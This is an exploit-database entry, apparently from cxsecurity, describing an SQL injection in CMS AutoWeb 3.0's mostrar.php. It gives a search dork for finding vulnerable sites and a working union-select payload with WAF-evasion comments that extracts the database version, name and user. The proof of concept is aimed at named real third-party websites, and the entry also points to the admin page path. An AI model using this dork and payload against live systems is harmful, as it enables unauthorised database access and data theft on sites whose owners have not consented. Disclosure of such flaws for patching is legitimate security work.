CMS AutoWeb 3.0 SQL Injection

2014.09.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+] Sql Injection on CMS AutoWeb v3.0 [+] Date: 24/09/2014 [+] CWE Number : CWE-89 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.multdivision.com.br [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: mostrar.php [+} Dork : inurl:"mostrar.php?id_noticia=" [+] Exploit : http://host/mostrar.php?id_noticia=[SQL Injection] ps:need bypass the WAF protection use sql injection manual. [+] PoC: http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28%29,4,user%28%29,6,7,8,9,10--+ <-- example of how to xploit http://fmg.edu.br/mostrar.php?id_noticia=77' [+] Admin Page: http://host/admin/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top